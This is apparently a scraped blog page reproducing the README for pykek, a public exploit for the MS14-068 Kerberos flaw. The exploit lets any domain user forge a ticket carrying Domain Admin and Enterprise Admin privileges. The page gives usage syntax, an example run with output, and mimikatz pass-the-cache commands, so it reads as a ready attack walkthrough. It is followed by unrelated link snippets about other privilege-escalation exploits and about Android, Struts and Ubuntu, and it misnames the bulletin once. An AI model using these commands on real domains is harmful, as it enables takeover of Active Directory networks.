https://github.com/bidord/pykek

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of
an Active Directory domain to get a Kerberos ticket for an existing
domain user account with the privileges of the following domain groups :

Domain Users (513)

Domain Admins (512)

Schema Admins (518)

Enterprise Admins (519)

Group Policy Creator Owners (520)

USAGE:

ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

OPTIONS:

    -p <clearPassword>

--rc4 <ntlmHash>

Example usage :

Linux (tested with samba and MIT Kerberos)

root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc
-s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

Password:

  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!

  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!

  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!

  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!

  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!

  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!

  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!

  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!

  [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!

root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0

On Windows

python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`

http://zone.wooyun.org/content/17102

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员的更多相关文章

  1. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  2. [EXP]Memu Play 6.0.7 - Privilege Escalation

    # Exploit Title: Memu Play - Privilege Escalation (PoC) # Date: // # Author: Alejandra Sánchez # Ven ...

  3. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  4. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  5. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  6. FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

    /* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * Th ...

  7. Basic Linux Privilege Escalation

    (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...

  8. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  9. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

随机推荐

  1. Extjs中给同一个GridPanel中的事件添加参数的方法

    Extjs中给同一个GridPanel中的事件添加参数的方法: this.isUse = new Ext.Action({            text:'启用',            scope ...

  2. VelocityTracker简介

    android.view.VelocityTracker主要用跟踪触摸屏事件(flinging事件和其他gestures手势事件)的速率.用addMovement(MotionEvent)函数将Mot ...

  3. vmware安装linux.iso

    安装方法 : .进入Fedora后,在虚拟机选项栏中选VM->install vmware tools 拷贝VMware Tools.tar.gz到指定文件夹,解压缩 进入超级终端:在-> ...

  4. ubuntu 14.04安装mysql server & mysql client

    $ sudo apt-get install mysql-server

  5. 怎么判定一个mac地址是multicast还是unicast.

    MAC地址是以太网二层使用的一个48bit(6字节十六进制数)的地址,用来标识设备位置.MAC地址分成两部分,前24位是组织唯一标识符(OUI, Organizationally unique ide ...

  6. Struts2中ActionContext和ServletActionContext

    转自:http://blog.sina.com.cn/s/blog_6c9bac050100y9iw.html 在Web应用程序开发中,除了将请求参数自动设置到Action的字段中,我们往往也需要在A ...

  7. Individual Project - Word frequency program-11061171-MaoYu

    BUAA Advanced Software Engineering Project:  Individual Project - Word frequency program Ryan Mao (毛 ...

  8. 下面就介绍下Android NDK的入门学习过程(转)

    为何要用到NDK? 概括来说主要分为以下几种情况: 1. 代码的保护,由于apk的java层代码很容易被反编译,而C/C++库反汇难度较大. 2. 在NDK中调用第三方C/C++库,因为大部分的开源库 ...

  9. 《数据结构与算法分析》学习笔记(四)——栈ADT

    一.栈ADT是what? 1.定义 栈,是限制插入和删除都只能在一个位置上进行的表. 2.图示 3.栈的基本功能 (1)是否为空 (2)进栈 (3)出栈 (4)清空 (5)取栈顶 二.栈的链表实现 # ...

  10. 微信SDK开发学习

    public class MainActivity extends Activity { // 应用程序的id,就是在网上开发平台创建应用的appid public static final Stri ...